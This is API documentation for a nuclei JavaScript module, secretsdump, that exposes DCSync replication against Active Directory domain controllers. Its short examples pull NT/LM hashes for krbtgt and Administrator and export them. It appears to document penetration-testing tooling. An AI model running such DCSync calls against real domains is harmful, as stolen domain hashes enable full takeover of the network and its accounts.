Documentation
¶
Overview ¶
Package secretsdump exposes Mzack9999/goimpacket's DCSync (DRSUAPI IDL_DRSGetNCChanges) primitive to nuclei javascript templates.
DCSync requires Replicating Directory Changes / Replicating Directory Changes All extended rights on the domain head. Templates that reach this point typically already proved compromise of a Domain Admin account or of a principal with the right ACEs (e.g. via samr / ldap / kerberos chains).
Only single-object DCSync is exposed today; full-domain replication is intentionally left out as it requires explicit operator opt-in.
Index ¶
Constants ¶
This section is empty.
Variables ¶
This section is empty.
Functions ¶
Types ¶
type Client ¶
type Client struct {
Host string
Domain string
User string
Pass string
// contains filtered or unexported fields
}
Client wraps an authenticated session to a Domain Controller and exposes DCSync helpers.
@example ```javascript const sd = require('nuclei/secretsdump'); const c = new sd.Client('dc01.acme.local', 'acme.local', 'admin', 'P@ss'); const krbtgt = c.DCSync('krbtgt'); ExportAs('krbtgt_nthash', krbtgt.nthash); ```
func (*Client) DCSync ¶
DCSync replicates secrets for a single principal (DN, sAMAccountName, or SID) and returns its NT/LM hashes, hash history and account state.
@example ```javascript const sd = require('nuclei/secretsdump'); const c = new sd.Client('dc01', 'acme.local', 'admin', 'P@ss'); const s = c.DCSync('Administrator'); log(s.nthash); ```
type Secret ¶
type Secret struct {
SAMAccountName string `json:"sam_account_name"`
DistinguishedName string `json:"distinguished_name"`
RID uint32 `json:"rid"`
NTHash string `json:"nthash,omitempty"`
LMHash string `json:"lmhash,omitempty"`
NTHashHistory []string `json:"nthash_history,omitempty"`
LMHashHistory []string `json:"lmhash_history,omitempty"`
UserAccountControl uint32 `json:"user_account_control"`
PwdLastSet int64 `json:"pwd_last_set"`
}
Secret is the result of a DCSync against a single principal.
Source Files